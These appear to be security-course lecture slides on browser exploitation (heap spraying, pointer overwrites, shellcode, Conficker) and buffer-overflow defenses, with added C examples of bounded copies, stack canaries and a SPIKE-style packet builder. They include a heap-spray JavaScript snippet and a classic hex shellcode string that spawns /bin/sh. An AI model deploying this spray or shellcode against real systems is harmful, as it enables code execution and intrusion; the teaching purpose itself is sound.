   –  May be embedded in an image, document, or string in the attacker's script
•  Aiming the jump: difficult to get exactly, but there are ways...

State of the art in browser exploitation

Stack overflows: classic, but defenses have been raised

[Figure callouts naming the defenses: (Structured Exception Handling); (detect overruns before using jump address); (attacker has to guess at stack layout)]

Source for this slide and those that follow, through "Heap Feng Shui": "Heap Feng Shui in Javascript", Alexander Sotirov

Heap overflows

We've seen a proof of concept; in practice it is hard and defenses have been raised

[Figure callout: the unlinking trick shown earlier.... BUSTED]

What's left to attack?

•  Non-array stack overflows
   –  Very rare
•  Use of uninitialized variables
   –  Stack variables
   –  Use after "free"
•  Application data on the heap
   –  Application-specific memory headers
   –  Function pointers
   –  C++ object pointers

Definitive attack: "setSlice"

•  Uses heap spraying to fill the browser heap with shellcode
•  Overwrites an application object pointer in the previous heap chunk
   –  Here an application vulnerability is required
   –  Hope that after the attack overwrites the object pointer, the application actually uses that pointer!
   –  May just end up crashing the browser

Heap Spraying

Developed by Blazde and SkyLined, used by most browser exploits since 2004 (snippet as shown in Sotirov's talk)

    var x = new Array();
    // fill 200MB of memory with copies of NOP
    // slide and shellcode
    for (var i = 0; i < 200; i++) {
        x[i] = nop + shellcode;
    }

Normal heap layout

[Figure: heap layout diagram from Sotirov's talk]

After heap spraying

[Figure: the same heap after the 200MB spray, from Sotirov's talk]

Function pointer overwrite

1.  Spray the heap with 200MB of shellcode (and slide)
2.  Overwrite a function pointer with 0x0c0c0c0c (e.g. some pointer to an exception handler in static data)
3.  Arrange for the pointer to be called

Object pointer overwrite

•  Spray the heap with 200MB of shellcode, using byte 0x0c as a NOP
•  Overwrite an object pointer with 0x0c0c0c0c
•  Call a virtual function of the object

[Figure: the pointer chase through the sprayed heap, labelled "presumed object at 0xc0c0c0c0", "presumed vtable at 0xc0c0c0c0", "presumed function at 0xc0c0c0c0"]

The pointer to the table of virtual function pointers is at some offset from the object base, but whatever is read there is 0x0c0c0c0c

The particular function called determines the offset into the vtable... but whatever it indexes to, the value there is 0x0c0c0c0c

Clever but unreliable

•  Heap spraying is very effective, but the setSlice exploit is not reliable
•  Overwriting application data requires a specific layout of heap chunks, which setSlice does not control
•  Need to prepare the heap state prior to the exploit

Heap Feng Shui

•  The heap allocator is deterministic
•  Specific sequences of allocations and frees can be used to control the layout
•  Exploit requires a very careful series of heap ops from Javascript.... but it works....

You promised us shellcode...

•  Small piece of code used as the payload in an exploit of a computer vulnerability
   –  Needs to be in binary
      •  Requires attention to a lot of details
      •  Can't have null bytes (usually passed as a string, and a null terminates a string)
   –  Gives some kind of service to the attacker
      •  An interactive command "shell"
      •  TCP/IP connection back to the attacker
      •  Downloads and executes malware
         –  "drive-by downloads"

More on Shell Code

•  Insert code to spawn a shell
•  Phrack article discusses how to do this from first principles
   –  Create assembly code to exec /bin/sh
   –  Use GDB to get the hex of the binary code
   –  Rework the assembly as necessary to avoid internal 0's
      •  Could break the attack if strcpy is used by the attack target
   –  Will result in a hex string like:
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"

More on shellcodes

•  Local
   –  Hacker sitting at the machine, networking not needed
•  Remote
   –  Connect-back: shellcode able to open a TCP/IP connection back to the attacker
   –  Bindshell: shellcode has to "bind" to a port and "listen" for a connection from the attacker
   –  Socket-reuse: shellcode able to use an already opened network connection
      •  Hard to exploit, hard to detect
•  Big win if the exploited code is "setuid"
   –  Means that the malware can run with root privileges

Drive-by downloads

•  In 2007 Google surveyed billions of sites, subjecting 4.5M to scrutiny
   –  450,000 able to launch drive-by downloads (only through vulnerable browsers)
   –  Another 700,000 capable of other compromises
•  Many use social engineering, "click here for ...."
•  Attack code often hidden in parts of the page not controlled by the site
   –  Banner advertisements, widgets (e.g. traffic counter)... these are loaded from a 3rd-party site
   –  Postings / comments in blogs (see cross-site scripting)

Botnets

A compromised host ("zombie") follows commands obtained from a C&C (command and control) computer

•  Zombie will scan its environment for resources (what can it be used for?) and report to the bot master
•  Will often use an IRC channel, IM, or twitter for communication (to hide)
   –  But these become known
   –  Reaction has been designs that are more resilient to identification, shutdown, and C&C discovery

Botnet economy

•  Large botnets have grown (e.g., Conficker)
•  Use is sold in an underground economy, e.g., to serve out spam

Conficker

See http://mtc.sri.com/Conficker

Timeline
•  Sept 08: previously unknown vulnerability used in exploits (dubbed MS08-67): malformed Remote Procedure Call requests in Windows cause a buffer overflow
   –  Affects all modern versions of Windows
•  Sept 08: Chinese hackers sell exploit for $37.80
•  Oct 23 08: Microsoft issues "emergency patch"
•  Nov. 22 08: Worm outbreak of Conficker reported in PC World
•  Last estimate over 12 million infections
   –  Why? Patch ignored. Many bootleg copies of Windows

Conficker: How it works

Exploit:
• Victim: Buffer overflow loads shellcode
– contacts the infector, which is running an HTTP service, and downloads the worm
– Worm is in dynamically linked library (DLL) form, runs as a service via svchost.exe
– encrypted
– Brought up with every reboot

• Worm scans (see the CAIDA report)
– Local network scans (determine broadcast domain from network interface)
– Nearby other infected hosts -- keeps a list of hosts it has infected, and scans the 256 hosts in the same /24 network
– Random

• Other infection vectors
– Executes through ADMIN$ share on computers visible to NetBIOS
• Dictionary attack if password protected
– Places copies of itself on removable drives (e.g., USB drives); loads onto the new victim when the drive is inserted, through AUTORUN


Conficker: Connectivity

Infected hosts can connect with a “master” to download new versions
– Variants A & B:
• Every day generate a list of 250 randomly generated IP addresses
• Eight times a day attempt connections to a service on every one of those IP addresses
– The randomness is camouflage
– Defense attempted: identify the IP addresses in these lists that are not already “registered”, register them (to take control), plant a honeypot
• Updates on 3/6/09 and 3/17/09 loaded a new version that organized infected hosts into a botnet
• On April 1, 2009 the worm changed behavior, checking into 500 rendezvous points selected from a pool of 50,000
– Anticipated that “something” would happen,
– But nothing new really did


Hardware-supported simple fix

The problem is that attack code is written into the stack or heap, and can be executed from there

The idea of tagging memory with r/w/x permissions has been around a very long time

NX (No eXecute) bit architecture tags pages – called XD (eXecute Disabled) by Intel, XN (eXecute Never) in ARM processors

Naturally there are attacks.... to turn this feature off!


Buffer Overflow Defenses

• Write correct code
• Use appropriate languages
• Use tools to analyze problems
• Address Space Randomization
• Make buffers non-executable
– Should never need to execute code on the stack or on the heap


Writing Correct Code

• Simple solution, but expensive!
– Performance vs. correctness
– Software industry practices
• Automatic source-code analysis (limited scope)
– Super greps like RATS and FlawFinder
– Embedded compiler analysis
• Audit teams, code review
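As an added example for the two slides above (not code from the slides or from any of the tools they name), here is the unbounded copy that the "super greps" flag, placed beside a bounded replacement of the kind the "write correct code" bullet asks for. The buffer size `NAME_LEN`, the function names and the sample inputs are assumptions made for this illustration:

```c
/* Added example, not from the slides: an unbounded copy beside a bounded
 * one. The buffer size, function names and sample inputs are assumed
 * for this illustration. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

#define NAME_LEN 16   /* size of the fixed local buffer */

/* The pattern the lecture warns about: strcpy() does not know how large
 * dst is, so any input of NAME_LEN or more characters writes past the
 * end of the buffer (the "before" form; nothing below calls it). */
void unsafe_copy(char dst[NAME_LEN], const char *src)
{
    strcpy(dst, src);
}

/* Bounded copy: never writes more than dst_len bytes, always
 * NUL-terminates, and tells the caller whether src fit. Reporting
 * truncation matters: silently clipped input is a logic bug of its own. */
bool safe_copy(char *dst, size_t dst_len, const char *src)
{
    size_t i;
    if (dst_len == 0)
        return false;
    for (i = 0; i + 1 < dst_len; i++) {
        if (src[i] == '\0') {        /* source ended: copy terminator */
            dst[i] = '\0';
            return true;
        }
        dst[i] = src[i];
    }
    dst[i] = '\0';                   /* out of room: terminate anyway */
    return src[i] == '\0';           /* true only if src ended exactly here */
}

/* Helpers for the demo and the checks: copy src into a NAME_LEN buffer
 * and report whether it fit, or how long the stored string is. */
bool fits_in_name(const char *src)
{
    char name[NAME_LEN];
    return safe_copy(name, sizeof name, src);
}

size_t stored_name_len(const char *src)
{
    char name[NAME_LEN];
    safe_copy(name, sizeof name, src);
    return strlen(name);
}

int main(void)
{
    /* constructed inputs: one that fits and one that does not */
    const char *inputs[] = { "alice", "this-name-is-far-too-long-for-the-buffer" };
    for (size_t k = 0; k < 2; k++) {
        char name[NAME_LEN];
        bool ok = safe_copy(name, sizeof name, inputs[k]);
        printf("%-42s -> \"%s\" (%s)\n", inputs[k], name,
               ok ? "fits" : "truncated: reject or report");
    }
    return 0;
}
```

The bounded version is what a reviewer or an analysis tool wants to see in place of `strcpy`: the destination size travels with the pointer, and a caller that ignores the return value still gets a terminated, in-bounds string.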


Programming Languages

• Languages that are type-safe and enforce bounds checks
– E.g., Java, ML, Smalltalk
– Perl and Taint-mode
• Subsets of a language and/or code standards
– C++ using only smart pointers, std::strings, and STL containers
– Managed Code and the Common Runtime Library (CRL)


Tools for Buffer Overflow Protection

• LibSafe
– http://www.research.avayalabs.com/project/libsafe/
– Intercept calls to functions with known problems and perform extra checks
– Source is not necessary
• StackGuard and SSP/ProPolice
– Place “canary” values at key places on the stack
– Terminator (fixed) or random values
– ProPolice patch to gcc
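To make the canary bullets concrete, here is an added example (not StackGuard's or ProPolice's code) that models one stack frame as a byte array and shows how a terminator canary, checked in the function epilogue, catches an over-long copy before the saved return address would be used. The frame layout sizes, the canary bytes and the inputs are assumptions for this illustration:

```c
/* Added example, not StackGuard/ProPolice code: a model of a protected
 * stack frame. The frame is one byte array laid out the way a compiler
 * lays out a frame,
 *     [ local buffer ][ canary ][ saved frame pointer / return address ]
 * so every write stays inside that array and the model is plain C.
 * Sizes, canary bytes and inputs are assumptions for this illustration. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdbool.h>

#define BUF_LEN    16                      /* local char buffer */
#define CANARY_LEN  4
#define SAVED_LEN   8                      /* the state the canary guards */
#define FRAME_LEN  (BUF_LEN + CANARY_LEN + SAVED_LEN)

/* Terminator canary: NUL, CR, LF and 0xff. String routines stop at one
 * of these, so an overflow that arrives through them cannot write the
 * same bytes back and leave the canary looking intact. */
static const uint8_t TERMINATOR_CANARY[CANARY_LEN] = { 0x00, 0x0d, 0x0a, 0xff };

/* Prologue: place the canary between the locals and the saved state. */
static void prologue(uint8_t frame[FRAME_LEN], const uint8_t canary[CANARY_LEN])
{
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + BUF_LEN, canary, CANARY_LEN);
}

/* Epilogue: true if the canary is intact; false means the bytes beyond
 * the buffer were overwritten, and a real build aborts here instead of
 * returning through a possibly corrupted address. */
static bool epilogue_ok(const uint8_t frame[FRAME_LEN], const uint8_t canary[CANARY_LEN])
{
    return memcmp(frame + BUF_LEN, canary, CANARY_LEN) == 0;
}

/* The unchecked copy into the local buffer, modelled on strcpy(): it
 * copies until the input's NUL however long the input is. It is clipped
 * at the end of the frame array only to keep the model itself in bounds. */
static void unchecked_copy(uint8_t frame[FRAME_LEN], const char *input)
{
    size_t i;
    for (i = 0; input[i] != '\0' && i < FRAME_LEN; i++)
        frame[i] = (uint8_t)input[i];
    if (i < FRAME_LEN)
        frame[i] = 0;                      /* strcpy's terminating NUL */
}

/* One simulated call of a function that copies input into its 16-byte
 * local buffer. Returns true if the canary survived, false if the
 * epilogue check would have caught an overflow. */
bool call_with_input(const char *input)
{
    uint8_t frame[FRAME_LEN];
    prologue(frame, TERMINATOR_CANARY);
    unchecked_copy(frame, input);
    return epilogue_ok(frame, TERMINATOR_CANARY);
}

/* Was the guarded saved state itself reached? Separates "canary tripped"
 * from "saved return address overwritten". */
bool saved_state_touched(const char *input)
{
    uint8_t frame[FRAME_LEN], zeros[SAVED_LEN] = { 0 };
    prologue(frame, TERMINATOR_CANARY);
    unchecked_copy(frame, input);
    return memcmp(frame + BUF_LEN + CANARY_LEN, zeros, SAVED_LEN) != 0;
}

int main(void)
{
    /* constructed inputs of increasing length */
    const char *inputs[] = {
        "hello",                               /* fits */
        "0123456789abcdef",                    /* 16 chars: NUL lands on canary byte 0, already 0 */
        "0123456789abcdefXYZ",                 /* 19 chars: canary clobbered */
        "0123456789abcdefXYZXYZXYZXYZXYZXYZ",  /* long enough to reach the saved state */
    };
    for (size_t k = 0; k < sizeof inputs / sizeof inputs[0]; k++)
        printf("%-36s canary %s, saved state %s\n", inputs[k],
               call_with_input(inputs[k]) ? "intact " : "TRIPPED",
               saved_state_touched(inputs[k]) ? "overwritten" : "untouched");
    return 0;
}
```

The 16-character input shows why a terminator canary starts with a NUL byte: a copy that overruns by exactly its terminator writes a zero onto a byte that is already zero, the check still passes, and the saved state is untouched. The random-canary variant named on the slide uses the same prologue and epilogue with a per-process value instead of the fixed bytes.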


Address Space Randomization

• Vary the base stack address with each execution
– Stack smashing must have an absolute address to overwrite the function return address
– Enabled by default in some Linuxes (e.g., FC3)
• Wastes some address space
– Less of an issue once we have a 64-bit address space
• Not absolute
– Try many times and get lucky


Misc.  


Fuzzing

• A variant of the fault injection model
– Create “fuzzed” input to cause errors
• ShareFuzz
– Intercept all getenv() calls to return very, very long strings


More Fuzz - SPIKE

• An input language for creating variant network packets
• From WireShark output, make it easy to express new packets
– a_binary("00 01 02 03")                               Data: <00 01 02 03>
– a_block_size_big-endian_word("Blockname");           Data: <00 01 02 03 00 00 00 00>
– a_block_start("Blockname") a_binary("05 06 07 08")   Data: <00 01 02 03 00 00 00 00 05 06 07 08>
– a_block_end("Blockname");                            Data: <00 01 02 03 00 00 00 04 05 06 07 08>
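The four lines above are the whole idea behind SPIKE's block primitives: a size field is reserved before its block is written and patched once the block is closed, so a fuzzer can vary the block's contents and the length field stays consistent. As an added example (not SPIKE's own code), the following minimal builder reproduces that sequence in C and generalises it to any block body; the type and function names, the fixed buffer limits and the hex inputs are assumptions for this illustration:

```c
/* Added example, not SPIKE's own code: a minimal packet builder with the
 * block/size-field idea shown on the slide. a_block_size_big_endian_word()
 * reserves a 4-byte length field that a_block_end() fills in once the
 * block's contents are known. Names and limits are assumptions. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdbool.h>

#define MAX_PKT    256
#define MAX_BLOCKS   8

typedef struct {
    uint8_t data[MAX_PKT];
    size_t  len;
    struct {
        const char *name;
        size_t size_off;      /* where the 4-byte length field sits */
        size_t start_off;     /* first byte of the block; (size_t)-1 until started */
    } blocks[MAX_BLOCKS];
    size_t nblocks;
} packet_t;

void pkt_init(packet_t *p) { memset(p, 0, sizeof *p); }

/* Append raw bytes written as "00 01 02 03". Returns false on overflow
 * or on a token that is not a hex byte. */
bool a_binary(packet_t *p, const char *hex)
{
    unsigned v;
    int consumed;
    while (sscanf(hex, " %2x%n", &v, &consumed) == 1) {
        if (p->len >= MAX_PKT) return false;
        p->data[p->len++] = (uint8_t)v;
        hex += consumed;
    }
    while (*hex == ' ') hex++;           /* only trailing blanks may remain */
    return *hex == '\0';
}

static int find_block(const packet_t *p, const char *name)
{
    for (size_t i = 0; i < p->nblocks; i++)
        if (strcmp(p->blocks[i].name, name) == 0) return (int)i;
    return -1;
}

/* Reserve a big-endian 32-bit size word for the block called name. */
bool a_block_size_big_endian_word(packet_t *p, const char *name)
{
    if (p->nblocks >= MAX_BLOCKS || p->len + 4 > MAX_PKT) return false;
    p->blocks[p->nblocks].name = name;
    p->blocks[p->nblocks].size_off = p->len;
    p->blocks[p->nblocks].start_off = (size_t)-1;
    p->nblocks++;
    memset(p->data + p->len, 0, 4);      /* placeholder until a_block_end */
    p->len += 4;
    return true;
}

bool a_block_start(packet_t *p, const char *name)
{
    int i = find_block(p, name);
    if (i < 0) return false;
    p->blocks[i].start_off = p->len;
    return true;
}

/* Close the block and patch its size field with the block's byte count. */
bool a_block_end(packet_t *p, const char *name)
{
    int i = find_block(p, name);
    if (i < 0 || p->blocks[i].start_off == (size_t)-1) return false;
    uint32_t size = (uint32_t)(p->len - p->blocks[i].start_off);
    uint8_t *f = p->data + p->blocks[i].size_off;
    f[0] = (uint8_t)(size >> 24); f[1] = (uint8_t)(size >> 16);
    f[2] = (uint8_t)(size >> 8);  f[3] = (uint8_t)size;
    return true;
}

/* Build the exact sequence from the slide; returns the packet length. */
size_t build_slide_packet(uint8_t out[MAX_PKT])
{
    packet_t p;
    pkt_init(&p);
    a_binary(&p, "00 01 02 03");
    a_block_size_big_endian_word(&p, "Blockname");
    a_block_start(&p, "Blockname");
    a_binary(&p, "05 06 07 08");
    a_block_end(&p, "Blockname");
    memcpy(out, p.data, p.len);
    return p.len;
}

bool slide_packet_matches(void)
{
    static const uint8_t want[] = { 0x00,0x01,0x02,0x03, 0x00,0x00,0x00,0x04, 0x05,0x06,0x07,0x08 };
    uint8_t got[MAX_PKT];
    size_t n = build_slide_packet(got);
    return n == sizeof want && memcmp(got, want, n) == 0;
}

/* Generalisation: the size field read back for an arbitrary block body. */
uint32_t block_size_for(const char *body_hex)
{
    packet_t p;
    pkt_init(&p);
    a_block_size_big_endian_word(&p, "B");
    a_block_start(&p, "B");
    a_binary(&p, body_hex);
    a_block_end(&p, "B");
    return ((uint32_t)p.data[0] << 24) | ((uint32_t)p.data[1] << 16) |
           ((uint32_t)p.data[2] << 8) | p.data[3];
}

int main(void)
{
    uint8_t pkt[MAX_PKT];
    size_t n = build_slide_packet(pkt);
    printf("Data: <");
    for (size_t i = 0; i < n; i++) printf("%s%02x", i ? " " : "", pkt[i]);
    printf(">\n");
    return 0;
}
```

Running it prints the slide's final `Data: <00 01 02 03 00 00 00 04 05 06 07 08>`; swapping the body passed to `block_size_for` shows the length field following the body, which is what lets a fuzzer grow or shrink a block without hand-editing the header.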


Exploit Frameworks

• Metasploit
– http://www.metasploit.com/index.html
• Canvas
– http://www.immunitysec.com
• Core Impact
– http://www.coresecurity.com/products/coreimpact/index.php


Defense Through Attack

• Ethical hacking
– You too can become a certified ethical hacker
• http://www.wired.com/news/infostructure/0,1377,64008,00.html
• http://www.vigilar.com/training/ceh/index.html?gclid=CKSSs-_EvIgCFSAeWAodGm7MaQ
• Hip term for
– Penetration Testing
– Vulnerability analysis
– Vulnerability researching


Penetration Testing

• Bring in an outside team to “attack” the system
– Well-defined rules of engagement, e.g.,
• no DOS, but social engineering is allowed
• Specified target of attack
• Cause no permanent damage
• Amount of inside knowledge
• Benefits
– Ability to think outside the box may reveal new issues
• Concerns
– All discovered flaws reported?
– Probably not systematic


Vulnerability Research

• Find exploits in deployed software
– Zero Day exploit – Exploit that is released before a fix is available
• Ethical issues once an exploit is found
– How soon to reveal the exploit after giving the vendor a heads-up?
– Can you protect your customers in the meantime?


Software Fault Injection

• Hardware fault injection well used and understood
– Software fault injection still emerging
– Active research area at CSL
• Identify input areas
– Generally network, but could also be files, environment variables, command line
• Inject bad inputs and see what happens


Fault Injection Model

(Figure: Client and Server, with a Fault Injector between them and an Auditor observing)

